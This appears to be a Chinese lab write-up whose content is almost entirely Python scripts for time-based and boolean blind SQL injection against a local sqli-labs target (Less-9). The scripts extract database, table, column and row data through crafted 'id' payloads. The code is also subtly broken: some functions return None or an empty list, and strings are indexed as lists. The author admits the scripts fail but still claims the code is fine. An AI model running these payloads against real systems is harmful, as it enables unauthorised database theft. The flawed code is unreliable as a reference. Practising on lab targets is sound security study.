
SQL:时间盲注和布尔盲注

关于时间盲注、布尔盲注中后面几个获取表、列、具体数据的函数的补全

时间盲注方法

import time
import requests

# 获取数据库名
def inject_database(url):
    """Recover the current database name, one character at a time, via the timing oracle.

    For each position 1-19 a binary search over the range 32-128 narrows the
    character down: the probe asks the server to ``sleep(3)`` when the
    character's ASCII value is greater than the guess, and a round trip of at
    least 3 s is read as "greater".  The scan stops at the first position that
    resolves to 32.  The recovered name is printed; the function returns
    ``None`` (the ``__main__`` block below nevertheless binds its result).

    Args:
        url: Target endpoint; the probe is sent as the ``id`` query parameter.
    """
    recovered = ''
    for position in range(1, 20):
        lo, hi = 32, 128
        guess = (lo + hi) // 2
        while lo < hi:
            probe = "1' and if(ascii(substr(database(), %d, 1)) > %d, sleep(3), 0)-- " % (position, guess)
            started = time.time()
            # The response body is irrelevant; only the round-trip time is used.
            requests.get(url, params={"id": probe})
            elapsed = time.time() - started
            if elapsed >= 3:
                lo = guess + 1
            else:
                hi = guess
            guess = (lo + hi) // 2
        if guess == 32:
            break
        recovered += chr(guess)
    print(recovered)

# 获取表名
def table_inject(url, dataname):
    """Recover the first table name in schema *dataname* via the timing oracle.

    Only the ``limit 0, 1`` row of ``information_schema.tables`` is ever
    queried, so a single name comes back as a plain ``str`` (the ``__main__``
    block below indexes the result as though it were a list).  Each character
    is found by binary search over 32-127, treating a round trip of at least
    3 s (the requested ``sleep(3)``) as "greater than"; the scan ends at the
    first position that resolves to 32 and has no upper bound on positions.

    Args:
        url: Target endpoint; the probe is sent as the ``id`` query parameter.
        dataname: Schema name, interpolated unescaped into the probe.

    Returns:
        The recovered table name, or ``""`` if the first position resolved to 32.
    """
    index = 0  # only the first table row is ever requested
    recovered = ""
    position = 1
    while True:
        lo, hi = 32, 127
        while lo < hi:
            guess = (lo + hi) // 2
            probe = f"1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='{dataname}' limit {index}, 1), {position}, 1)) > {guess}, sleep(3), 0)-- "
            started = time.time()
            requests.get(url, params={"id": probe})
            # A round trip of at least the sleep length means "greater than".
            if time.time() - started >= 3:
                lo = guess + 1
            else:
                hi = guess
        if lo == 32:
            break
        recovered += chr(lo)
        position += 1
    return recovered

# 获取列名
def colum_inject(url, dataname, table_name):
    """Recover the first column name of *table_name* in *dataname* via the timing oracle.

    Only the ``limit 0, 1`` row of ``information_schema.columns`` is queried,
    so the result is a single name as a ``str``.  Each character is found by
    binary search over 32-127, treating a round trip of at least 3 s (the
    requested ``sleep(3)``) as "greater than"; the scan ends at the first
    position that resolves to 32 and has no upper bound on positions.

    Args:
        url: Target endpoint; the probe is sent as the ``id`` query parameter.
        dataname: Schema name, interpolated unescaped into the probe.
        table_name: Table name, interpolated unescaped into the probe.

    Returns:
        The recovered column name (``""`` if nothing resolved).
    """
    index = 0  # only the first column row is ever requested
    recovered = ""
    position = 1
    while True:
        lo, hi = 32, 127
        while lo < hi:
            guess = (lo + hi) // 2
            probe = f"1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='{dataname}' and table_name='{table_name}' limit {index}, 1), {position}, 1)) > {mid_placeholder(guess)}, sleep(3), 0)-- " if False else f"1' and if(ascii(substr((select column_name from information_schema.columns where table_schema='{dataname}' and table_name='{table_name}' limit {index}, 1), {position}, 1)) > {guess}, sleep(3), 0)-- "
            started = time.time()
            requests.get(url, params={"id": probe})
            if time.time() - started >= 3:
                lo = guess + 1
            else:
                hi = guess
        if lo == 32:
            break
        recovered += chr(lo)
        position += 1
    return recovered

# 获取具体数据
def data_inject(url, dataname, table_name, colum_name):
    """Probe the first row of ``dataname.table_name`` in column ``colum_name`` via the timing oracle.

    Each character is found by binary search over 32-127, treating a round
    trip of at least 3 s (the requested ``sleep(3)``) as "greater than"; the
    scan ends at the first position that resolves to 32.  The recovered text
    is accumulated in a local that is never added to the returned list, so
    after issuing its requests the function always returns ``[]``.

    Args:
        url: Target endpoint; the probe is sent as the ``id`` query parameter.
        dataname: Schema name, interpolated unescaped into the probe.
        table_name: Table name, interpolated unescaped into the probe.
        colum_name: Column name, interpolated unescaped into the probe.

    Returns:
        An empty list.
    """
    rows = []
    index = 0  # only the first row is ever requested
    cell = ""
    position = 1
    while True:
        lo, hi = 32, 127
        while lo < hi:
            guess = (lo + hi) // 2
            probe = f"1' and if(ascii(substr((select {colum_name} from {dataname}.{table_name} limit {index}, 1), {position}, 1)) > {guess}, sleep(3), 0)-- "
            started = time.time()
            requests.get(url, params={"id": probe})
            if time.time() - started >= 3:
                lo = guess + 1
            else:
                hi = guess
        if lo == 32:
            break
        cell += chr(lo)
        position += 1
    return rows


def _run_time_based(target):
    """Chain the four timing-oracle helpers against *target*, printing each stage.

    ``inject_database`` returns ``None`` and ``table_inject`` /
    ``colum_inject`` return plain strings, so the ``[0]`` indexing below
    yields the first character of a name rather than a whole name.
    """
    dataname = inject_database(target)
    print(f"database: {dataname}")
    table_names = table_inject(target, dataname)
    print(f"table-name: {table_names}")
    if not table_names:
        return
    table_name = table_names[0]
    colum_names = colum_inject(target, dataname, table_name)
    print(f"colum-name: {colum_names}")
    if not colum_names:
        return
    colum_name = colum_names[0]
    data = data_inject(target, dataname, table_name, colum_name)
    print(f"时间盲注 - 具体数据: {data}")


if __name__ == '__main__':
    _run_time_based('http://127.0.0.1:8080/sqlilabs/Less-9/')

布尔盲注方法

import requests

# 通用的布尔盲注函数
def boolen_inject(url, payload, payloadfas, params):
    """Generic boolean-oracle extraction driver.

    ``payload`` and ``payloadfas`` are format strings with two ``{}`` slots
    (character position, ASCII value).  For each position 1-19 the values
    32-126 are tried in order; both filled-in probes are sent, one after the
    other, as the ``params`` query parameter, and the first value whose two
    response bodies differ is taken as the character and recorded as
    ``chr(value + 1)``.  When no value at a position yields differing bodies
    the scan stops.  Up to 2 x 95 requests are issued per position.

    Args:
        url: Target endpoint.
        payload: Format string for the "true" probe.
        payloadfas: Format string for the "false" probe.
        params: Name of the query parameter carrying the probe.

    Returns:
        The recovered string (possibly empty).
    """
    recovered = ""
    for position in range(1, 20):
        matched = None
        for code in range(32, 127):
            body_true = requests.get(url, params={params: payload.format(position, code)}).text
            body_false = requests.get(url, params={params: payloadfas.format(position, code)}).text
            if body_true != body_false:
                matched = code
                break
        if matched is None:
            break
        recovered += chr(matched + 1)
    return recovered

# 布尔盲注获取数据库名
def get_database_name(url, params):
    """Recover the current database name through :func:`boolen_inject`.

    Args:
        url: Target endpoint.
        params: Name of the query parameter carrying the probe.

    Returns:
        The recovered name as produced by :func:`boolen_inject`.
    """
    probe_gt = "1' and ascii(substr(database(), {}, 1)) > {} -- "
    probe_le = "1' and ascii(substr(database(), {}, 1)) <= {} -- "
    return boolen_inject(url, probe_gt, probe_le, params)

# 布尔盲注获取表名
def table_inject(url, params, database_name):
    """Enumerate table names of *database_name* through :func:`boolen_inject`.

    Rows of ``information_schema.tables`` are requested at ``limit index, 1``
    for index 0, 1, 2, ... until :func:`boolen_inject` returns an empty
    string.

    Args:
        url: Target endpoint.
        params: Name of the query parameter carrying the probe.
        database_name: Schema name, interpolated unescaped into the probe.

    Returns:
        List of recovered table names, in enumeration order.
    """
    found = []
    index = 0
    while True:
        # Shared prefix; the comparison operator and value slot are appended.
        base = (
            f"1' and ascii(substr((select table_name from information_schema.tables "
            f"where table_schema='{database_name}' limit {index}, 1), {{}}, 1)) "
        )
        name = boolen_inject(url, base + "> {} -- ", base + "<= {} -- ", params)
        if not name:
            return found
        found.append(name)
        index += 1

# 布尔盲注获取列名
def column_inject(url, params, database_name, table_name):
    """Enumerate column names of *table_name* through :func:`boolen_inject`.

    Rows of ``information_schema.columns`` are requested at ``limit index, 1``
    for index 0, 1, 2, ... until :func:`boolen_inject` returns an empty
    string.

    Args:
        url: Target endpoint.
        params: Name of the query parameter carrying the probe.
        database_name: Schema name, interpolated unescaped into the probe.
        table_name: Table name, interpolated unescaped into the probe.

    Returns:
        List of recovered column names, in enumeration order.
    """
    found = []
    index = 0
    while True:
        # Shared prefix; the comparison operator and value slot are appended.
        base = (
            f"1' and ascii(substr((select column_name from information_schema.columns "
            f"where table_schema='{database_name}' and table_name='{table_name}' limit {index}, 1), {{}}, 1)) "
        )
        name = boolen_inject(url, base + "> {} -- ", base + "<= {} -- ", params)
        if not name:
            return found
        found.append(name)
        index += 1

# 布尔盲注获取具体数据
def data_inject(url, params, database_name, table_name, column_name):
    """Read *column_name* of ``database_name.table_name`` row by row through :func:`boolen_inject`.

    Rows are requested at ``limit index, 1`` for index 0, 1, 2, ... until
    :func:`boolen_inject` returns an empty string.

    Args:
        url: Target endpoint.
        params: Name of the query parameter carrying the probe.
        database_name: Schema name, interpolated unescaped into the probe.
        table_name: Table name, interpolated unescaped into the probe.
        column_name: Column name, interpolated unescaped into the probe.

    Returns:
        List of recovered cell values, in row order.
    """
    found = []
    index = 0
    while True:
        # Shared prefix; the comparison operator and value slot are appended.
        base = f"1' and ascii(substr((select {column_name} from {database_name}.{table_name} limit {index}, 1), {{}}, 1)) "
        value = boolen_inject(url, base + "> {} -- ", base + "<= {} -- ", params)
        if not value:
            return found
        found.append(value)
        index += 1

def _run_boolean_based(target, param):
    """Chain the boolean-oracle helpers against *target*, printing each stage."""
    database_name = get_database_name(target, param)
    print(f"database_name: {database_name}")
    table_names = table_inject(target, param, database_name)
    print(f"table_name: {table_names}")
    if not table_names:
        return
    table_name = table_names[0]
    column_names = column_inject(target, param, database_name, table_name)
    print(f"column_name: {column_names}")
    if not column_names:
        return
    column_name = column_names[0]
    data = data_inject(target, param, database_name, table_name, column_name)
    print(f"data: {data}")


if __name__ == '__main__':
    _run_boolean_based("http://127.0.0.1:8080/sqlilabs/Less-9/index.php", "id")

实验结论

但是两种方式都显示不了数据库名称。检查后发现是基础配置问题导致代码连接不上,而在浏览器中直接访问网址是可以的。

代码本身没有问题。

现在我还没有找到问题所在,后面会抽时间改进。

